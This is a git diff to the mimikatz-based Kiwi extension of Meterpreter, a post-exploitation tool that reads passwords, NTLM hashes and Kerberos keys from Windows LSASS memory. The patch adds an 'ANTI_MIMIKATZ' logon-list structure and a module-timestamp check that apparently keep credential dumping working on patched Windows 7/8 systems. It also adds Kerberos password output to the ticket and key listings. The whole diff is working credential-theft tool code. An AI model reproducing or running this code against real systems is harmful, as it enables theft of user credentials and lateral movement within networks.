diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
index 1f987a68..91721036 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -47,6 +47,7 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
 	{sizeof(KIWI_MSV1_0_LIST_52), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Session),	FIELD_OFFSET(KIWI_MSV1_0_LIST_52, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, CredentialManager)},
 	{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session),	FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
 	{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session),	FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
+	{sizeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, CredentialManager)},
 	{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session),	FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
 	{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session),	FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
 };
@@ -317,9 +318,13 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
 		if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
 			helper = &lsassEnumHelpers[3];
 		if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
-			helper = &lsassEnumHelpers[4];
-		else
 			helper = &lsassEnumHelpers[5];
+		else
+			helper = &lsassEnumHelpers[6];
+
+
+		if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
+			helper++; // yeah, really, I do that =)
 
 		securityStruct.hMemory = cLsass.hLsassMem;
 		securityStruct.address = LogonSessionListCount;
@@ -389,7 +394,9 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
 	dprintf(L"[KIWI] callback invoked with %p", pData);
 	if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
 	{
-		kuhl_m_sekurlsa_printinfos_logonData(pData);
+		dprintf(L"[KIWI] pData->LogonType != Network, printing logon data");
+		//kuhl_m_sekurlsa_printinfos_logonData(pData);
+		dprintf(L"[KIWI] logondata printed, iterating through packages");
 		for(i = 0; i < pLsassData->nbPackages; i++)
 		{
 			if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
@@ -399,6 +406,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
 				kprintf(L"\n");
 			}
 		}
+		dprintf(L"[KIWI] package iteration done");
 	}
 	return TRUE;
 }
@@ -612,7 +620,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
 		{
 			pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
-			kprintf(L"\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
+			kprintf(L"\t %s ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
 			if (buffer.Length = buffer.MaximumLength = (USHORT)pHashPassword->Size)
 			{
 				buffer.Buffer = (PWSTR)pHashPassword->Checksump;
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
index 332e6fb4..16fa1524 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
@@ -149,6 +149,43 @@ typedef struct _KIWI_MSV1_0_LIST_61 {
 	PVOID CredentialManager;
 } KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
 
+typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
+	struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Flink;
+	struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Blink;
+	PVOID unk0;
+	ULONG unk1;
+	PVOID unk2;
+	ULONG unk3;
+	ULONG unk4;
+	ULONG unk5;
+	HANDLE hSemaphore6;
+	PVOID unk7;
+	HANDLE hSemaphore8;
+	PVOID unk9;
+	PVOID unk10;
+	ULONG unk11;
+	ULONG unk12;
+	PVOID unk13;
+	LUID LocallyUniqueIdentifier;
+	LUID SecondaryLocallyUniqueIdentifier;
+	BYTE waza[12]; /// to do (maybe align) <===================
+	LSA_UNICODE_STRING UserName;
+	LSA_UNICODE_STRING Domaine;
+	PVOID unk14;
+	PVOID unk15;
+	PSID pSid;
+	ULONG LogonType;
+	ULONG Session;
+	LARGE_INTEGER LogonTime; // autoalign x86
+	LSA_UNICODE_STRING LogonServer;
+	PKIWI_MSV1_0_CREDENTIALS Credentials;
+	PVOID unk19;
+	PVOID unk20;
+	PVOID unk21;
+	ULONG unk22;
+	PVOID CredentialManager;
+} KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, *PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ;
+
 typedef struct _KIWI_MSV1_0_LIST_62 {
 	struct _KIWI_MSV1_0_LIST_62 *Flink;
 	struct _KIWI_MSV1_0_LIST_62 *Blink;
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c
index a69f811f..31878692 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c
@@ -5,7 +5,7 @@
 */
 #include "kuhl_m_sekurlsa_credman.h"
 
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_single_package[] = {&kuhl_m_sekurlsa_credman_package};
 
 NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c
index 4a0b2357..d8c3d2d9 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c
@@ -30,8 +30,8 @@ KULL_M_PATCH_GENERIC MasterKeyCacheReferences[] = {
 
 PKIWI_MASTERKEY_CACHE_ENTRY pMasterKeyCacheList = NULL;
 
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 
 NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
 {
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
index 461928de..93977604 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
@@ -126,7 +126,7 @@ const KERB_INFOS kerbHelper[] = {
 	},
 };
 
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_single_package[] = {&kuhl_m_sekurlsa_kerberos_package};
 
 NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
@@ -184,6 +184,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECU
 	PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET)pOptionalData;
 	DWORD i;
 	kuhl_m_sekurlsa_printinfos_logonData(pData);
+	kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
+	kprintf(L"\n");
 	for (i = 0; i < 3; i++)
 	{
 		kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
@@ -199,7 +201,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
 	if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
 	{
 		kuhl_m_sekurlsa_printinfos_logonData(pData);
-		kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
+		kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
+		kprintf(L"\n\t * Key List :\n");
 		if (aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
 		{
 			if (kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
@@ -397,7 +400,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
 								if (App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket))
 								{
 									if (kull_m_file_writeData(filename, (PBYTE)App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
-										kprintf(L"\n\t * Saved to file %s !\n", filename);
+										kprintf(L"\n\t * Saved to file %s !", filename);
 									else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
 									LocalFree(App_KrbCred);
 								}
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c
index 7267c3df..a9f5b885 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c
@@ -18,7 +18,7 @@ KULL_M_PATCH_GENERIC LiveReferences[] = {
 
 PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList = NULL;
 
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_single_package[] = {&kuhl_m_sekurlsa_livessp_package};
 
 NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
index caf636fa..ec89b1a9 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
@@ -9,7 +9,7 @@ const ANSI_STRING
 	PRIMARY_STRING = {7, 8, "Primary"},
 	CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
 
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_single_package[] = {&kuhl_m_sekurlsa_msv_package};
 
 NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
@@ -94,34 +94,40 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
 {
 	KIWI_MSV1_0_CREDENTIALS credentials;
 	KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
-	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
-	KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
+	KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
+	KULL_M_MEMORY_ADDRESS aLocalMemory = { NULL, &hLocalMemory }, aLsassMemory = { pCredentials, cLsass->hLsassMem };
 
-	while(aLsassMemory.address)
+	while (aLsassMemory.address)
 	{
 		aLocalMemory.address = &credentials;
-		if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
+		if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
 		{
 			aLsassMemory.address = credentials.PrimaryCredentials;
-			while(aLsassMemory.address)
+			while (aLsassMemory.address)
 			{
 				aLocalMemory.address = &primaryCredentials;
-				if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
+				if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
 				{
 					aLsassMemory.address = primaryCredentials.Credentials.Buffer;
-					if(kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
+					if (kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
 					{
-						if(kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, cLsass->hLsassMem))
+						if (kull_m_string_getUnicodeString((PUNICODE_STRING)&primaryCredentials.Primary, cLsass->hLsassMem))
 						{
 							credCallback(&primaryCredentials, credentials.AuthenticationPackageId, &aLsassMemory, optionalData);
 							LocalFree(primaryCredentials.Primary.Buffer);
-						}							
+						}
 						LocalFree(primaryCredentials.Credentials.Buffer);
 					}
-				} else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
+				}
+				else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
 				aLsassMemory.address = primaryCredentials.next;
 			}
 			aLsassMemory.address = credentials.next;
-		} else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
+		}
+		else
+		{
+			kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
+			break;
+		}
 	}
 }
\ No newline at end of file
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
index b386325a..cd659ce2 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
@@ -23,7 +23,7 @@ KULL_M_PATCH_GENERIC SspReferences[] = {
 
 PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList = NULL;
 
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_single_package[] = {&kuhl_m_sekurlsa_ssp_package};
 
 NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c
index 360cdbe5..452f0284 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c
@@ -20,7 +20,7 @@ KULL_M_PATCH_GENERIC TsPkgReferences[] = {
 
 PRTL_AVL_TABLE TSGlobalCredTable = NULL;
 
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_single_package[] = {&kuhl_m_sekurlsa_tspkg_package};
 
 NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
index 15a8df33..5b756d0d 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
@@ -27,7 +27,7 @@ KULL_M_PATCH_GENERIC WDigestReferences[] = {
 PKIWI_WDIGEST_LIST_ENTRY l_LogSessList = NULL;
 LONG offsetWDigestPrimary = 0;
 
-KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
+KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
 const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_single_package[] = {&kuhl_m_sekurlsa_wdigest_package};
 
 NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
diff --git a/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.c b/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.c
index d46dd5d9..08449a4e 100644
--- a/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.c
+++ b/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.c
@@ -101,6 +101,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 					moduleInformation.DllBase.address = pLdrEntry->DllBase;
 					moduleInformation.SizeOfImage = pLdrEntry->SizeOfImage;
 					moduleInformation.NameDontUseOutsideCallback = &pLdrEntry->BaseDllName;
+					kull_m_process_adjustTimeDateStamp(&moduleInformation);
 					continueCallback = callBack(&moduleInformation, pvArg);
 				}
 				status = STATUS_SUCCESS;
@@ -121,6 +122,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 				moduleName.Length = pLdrEntry32->BaseDllName.Length;
 				moduleName.MaximumLength = pLdrEntry32->BaseDllName.MaximumLength;
 				moduleName.Buffer = (PWSTR) pLdrEntry32->BaseDllName.Buffer;
+				kull_m_process_adjustTimeDateStamp(&moduleInformation);
 				continueCallback = callBack(&moduleInformation, pvArg);
 			}
 			status = STATUS_SUCCESS;
@@ -151,8 +153,11 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 						if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength))
 						{
 							aBuffer.address = moduleName.Buffer; aProcess.address = LdrEntry.BaseDllName.Buffer;
-							if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
+							if (kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
+							{
+								kull_m_process_adjustTimeDateStamp(&moduleInformation);
 								continueCallback = callBack(&moduleInformation, pvArg);
+							}
 							LocalFree(moduleName.Buffer);
 						}
 					}
@@ -185,8 +190,11 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 						if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength))
 						{
 							aBuffer.address = moduleName.Buffer; aProcess.address = (PVOID) LdrEntry32.BaseDllName.Buffer;
-							if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
+							if (kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
+							{
+								kull_m_process_adjustTimeDateStamp(&moduleInformation);
 								continueCallback = callBack(&moduleInformation, pvArg);
+							}
 							LocalFree(moduleName.Buffer);
 						}
 					}
@@ -208,6 +216,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 				if(pMinidumpString = (PMINIDUMP_STRING) kull_m_minidump_RVAtoPTR(memory->pHandleProcessDmp->hMinidump, pMinidumpModuleList->Modules[i].ModuleNameRva))
 				{
 					RtlInitUnicodeString(&moduleName, wcsrchr(pMinidumpString->Buffer, L'\\') + 1);
+					kull_m_process_adjustTimeDateStamp(&moduleInformation);
 					continueCallback = callBack(&moduleInformation, pvArg);
 				}
 			}
@@ -223,6 +232,17 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 	return status;
 }
 
+void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information)
+{
+	PIMAGE_NT_HEADERS ntHeaders;
+	if (kull_m_process_ntheaders(&information->DllBase, &ntHeaders))
+	{
+		information->TimeDateStamp = ntHeaders->FileHeader.TimeDateStamp;
+		LocalFree(ntHeaders);
+	}
+	else information->TimeDateStamp = 0;
+}
+
 BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg)
 {
 	if(((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->isFound = RtlEqualUnicodeString(pModuleInformation->NameDontUseOutsideCallback, ((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->name, TRUE))
